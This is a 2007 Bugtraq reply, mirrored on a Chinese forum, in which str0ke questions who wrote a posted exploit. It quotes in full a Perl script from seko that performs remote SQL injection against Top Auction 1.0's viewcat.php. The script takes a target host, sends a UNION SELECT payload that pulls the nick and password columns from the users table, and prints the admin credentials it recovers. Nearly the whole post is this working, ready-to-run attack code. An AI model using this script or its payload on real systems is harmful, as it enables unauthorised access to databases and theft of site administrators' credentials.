Re: Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection //

看板Bugtraq作者str0ke.時間19年前 (2007/04/22 00:31)推噓0(0推 0噓 0→)

留言0則, 0人參與討論串2/2 (看更多)

Isn't this ajann's find / code? http://www.milw0rm.com/exploits/3456 /str0ke On 21 Apr 2007 12:46:35 -0000, seko@se-ko.info <seko@se-ko.info> wrote: > #!/usr/bin/perl > #Author : SekoMirza // French > #Script Name : Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection Exploit > #Greetings : Sh4dowM4n , PhanTOmOrhcid , Starhack.0rg , CaRaMeL , MBrain! , and all Turkishz Hackerzz > #S.Page : http://www.phplabs.com > > > use IO::Socket; > if(@ARGV < 1){ > print " > [======================================================================== > [// Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection Exploit > [// Usage: exploit.pl [target] > [// Example: exploit.pl victim.com > [// Example: exploit.pl victim.com > [// > [======================================================================== > "; > exit(); > } > #Local variables > $server = $ARGV[0]; > $server =~ s/(http:\/\/)//eg; > $host = "http://".$server; > $port = "80"; > $file = "/viewcat.php?category="; > > print "Script <DIR> : "; > $dir = <STDIN>; > chop ($dir); > > if ($dir =~ /exit/){ > print "-- Exploit Failed[You Are Exited] \n"; > exit(); > } > > if ($dir =~ /\//){} > else { > print "-- Exploit Failed[No DIR] \n"; > exit(); > } > > > $target = > > "-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),nick,char(112,97,115,115,58),password),3%20from%20use > > rs/*"; > $target = $host.$dir.$file.$target; > > #Writing data to socket > print "+**********************************************************************+\n"; > print "+ Trying to connect: $server\n"; > $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection > > failed...\n"; > print $socket "GET $target HTTP/1.1\n"; > print $socket "Host: $server\n"; > print $socket "Accept: */*\n"; > print $socket "Connection: close\n\n"; > print "+ Connected!...\n"; > #Getting > while($answer = <$socket>) { > if ($answer =~ /username:(.*?)pass/){ > print "+ Exploit succeed! Getting admin information.\n"; > print "+ ---------------- +\n"; > print "+ Username: $1\n"; > } > > if ($answer =~ /pass:(.*?)<\/title>/){ > print "+ Password: $1\n"; > } > > if ($answer =~ /Syntax error/) { > print "+ Exploit Failed : ( \n"; > print "+**********************************************************************+\n"; > exit(); > } > > if ($answer =~ /Internal Server Error/) { > print "+ Exploit Failed : ( \n"; > print "+**********************************************************************+\n"; > exit(); > } > } > >

‣ 返回看板[ Bugtraq ] 臭蟲

‣ 更多 str0ke. 的文章

文章代碼(AID): #16AZnv00 (Bugtraq)

討論串 (同標題文章)

完整討論串 (本文為第 2 之 2 篇)：

排序：最新先 | 最舊先 | 留言數

Re: Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection // Re: Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection //

str0ke.

19年前, 04/22

Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection // Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection //

19年前, 04/21

文章代碼(AID): #16AZnv00 (Bugtraq)